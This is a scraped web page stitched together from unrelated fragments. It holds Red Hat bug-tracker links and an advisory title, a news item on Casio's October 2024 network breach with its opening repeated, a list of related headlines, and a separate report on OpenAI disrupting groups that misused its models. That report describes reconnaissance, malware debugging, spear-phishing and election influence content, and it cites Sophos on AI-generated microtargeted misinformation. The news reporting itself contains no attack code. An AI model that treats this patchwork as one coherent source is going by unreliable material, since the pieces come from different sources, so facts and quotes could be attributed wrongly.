https://issues.redhat.com/browse/OCPBUGS-42384  
https://issues.redhat.com/browse/OCPBUGS-42438  
https://issues.redhat.com/browse/OCPBUGS-42586

Red Hat Security Advisory 2024-7594-03

Casio experienced a major cyberattack on October 5, 2024, causing system disruptions and raising concerns about a potential…

Casio experienced a major cyberattack on October 5, 2024, causing system disruptions and raising concerns about a potential data breach. The company is investigating the incident with cybersecurity experts.

Casio, the iconic Japanese electronics company, is in the spotlight again due to another cybersecurity breach. On October 5, 2024, **Casio** experienced a major cyberattack involving unauthorized access to its network, resulting in system-wide disruptions.

Although the company is still investigating whether attackers compromised sensitive data in the October 2024 incident, this comes on the heels of a significant data breach **in October 2023**, caused by human error. That breach affected users in 148 countries and targeted Casio’s ClassPad education platform, which is widely used by students and educators.

****The October 2024 Breach: What Happened?****

According to Casio’s **security advisory** published in Japanese, on October 5, 2024, an unidentified third-party actor gained unauthorized access to the company’s network triggering outages and temporarily disrupting several of the company’s services.

Casio has not yet revealed which specific services were impacted. The network breach is under investigation, and the company is working closely with cybersecurity experts to determine the full extent of the damage.

Casio released a statement acknowledging the breach and its potential impact, stating, “We deeply apologize for any concern and inconvenience this may cause to our customers and partners.” The company has restricted external access to its systems while the investigation is ongoing.

****Data Breach Concerns****

One of the concerns following the October 2024 cyberattack is whether any sensitive data, such as customer information or business-critical data, was compromised. As of now, no ransomware group has taken responsibility for the attack, despite the systemic disruptions that are typical in ransomware attacks.

Hackread.com is closely monitoring the situation, and this article will be updated as soon as Casio releases new information. Stay tuned for further developments!

1.  **Casio China Hacked, 150,000 user accounts leaked**
2.  **Casio Electronics Taiwan Website Hacked by SaMuRai Hacker**
3.  **Dell Discloses Data Breach As Hacker Sells 49M Customer Data**
4.  **Lesson from Casio’s Data Breach: Database Security Challenges**
5.  **Acer Data Breach: Hacker Claims to Sell 160GB Trove of Stolen Data**

Casio Hit by Major Cyberattack AGAIN

OpenAI on Wednesday said it has disrupted more than 20 operations and deceptive networks across the world that attempted to use its platform for malicious purposes since the start of the year.
This activity encompassed debugging malware, writing articles for websites, generating biographies for social media accounts, and creating AI-generated profile pictures for fake accounts on X.
"Threat

Cybercrime / Disinformation

OpenAI on Wednesday said it has disrupted more than 20 operations and deceptive networks across the world that attempted to use its platform for malicious purposes since the start of the year.

This activity encompassed debugging malware, writing articles for websites, generating biographies for social media accounts, and creating AI-generated profile pictures for fake accounts on X.

"Threat actors continue to evolve and experiment with our models, but we have not seen evidence of this leading to meaningful breakthroughs in their ability to create substantially new malware or build viral audiences," the artificial intelligence (AI) company said.

It also said it disrupted activity that generated social media content related to elections in the U.S., Rwanda, and to a lesser extent India and the European Union, and that none of these networks attracted viral engagement or sustained audiences.

This included efforts undertaken by an Israeli commercial company named STOIC (also dubbed Zero Zeno) that generated social media comments about Indian elections, as previously disclosed by Meta and OpenAI earlier this May.

Some of the cyber operations highlighted by OpenAI are as follows -

*   SweetSpecter, a suspected China-based adversary that leveraged OpenAI's services for LLM-informed reconnaissance, vulnerability research, scripting support, anomaly detection evasion, and development. It has also been observed conducting unsuccessful spear-phishing attempts against OpenAI employees to deliver the SugarGh0st RAT.

*   Cyber Av3ngers, a group affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC) used its models to conduct research into programmable logic controllers.

*   Storm-0817, an Iranian threat actor used its models to debug Android malware capable of harvesting sensitive information, tooling to scrape Instagram profiles via Selenium, and translating LinkedIn profiles into Persian.

Elsewhere, the company said it took steps to block several clusters, including an influence operation codenamed A2Z and Stop News, of accounts that generated English- and French-language content for subsequent posting on a number of websites and social media accounts across various platforms.

"\[Stop News\] was unusually prolific in its use of imagery," researchers Ben Nimmo and Michael Flossman said. "Many of its web articles and tweets were accompanied by images generated using DALL·E. These images were often in cartoon style, and used bright color palettes or dramatic tones to attract attention."

Two other networks identified by OpenAI Bet Bot and Corrupt Comment have been found to use their API to generate conversations with users on X and send them links to gambling sites, as well as manufacture comments that were then posted on X, respectively.

The disclosure comes nearly two months after OpenAI banned a set of accounts linked to an Iranian covert influence operation called Storm-2035 that leveraged ChatGPT to generate content that, among other things, focused on the upcoming U.S. presidential election.

"Threat actors most often used our models to perform tasks in a specific, intermediate phase of activity — after they had acquired basic tools such as internet access, email addresses and social media accounts, but before they deployed 'finished' products such as social media posts or malware across the internet via a range of distribution channels," Nimmo and Flossman wrote.

Cybersecurity company Sophos, in a report published last week, said generative AI could be abused to disseminate tailored misinformation by means of microtargeted emails.

This entails abusing AI models to concoct political campaign websites, AI-generated personas across the political spectrum, and email messages that specifically target them based on the campaign points, thereby allowing for a new level of automation that makes it possible to spread misinformation at scale.

"This means a user could generate anything from benign campaign material to intentional misinformation and malicious threats with minor reconfiguration," researchers Ben Gelman and Adarsh Kyadige said.

"It is possible to associate any real political movement or candidate with supporting any policy, even if they don't agree. Intentional misinformation like this can make people align with a candidate they don't support or disagree with one they thought they liked."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web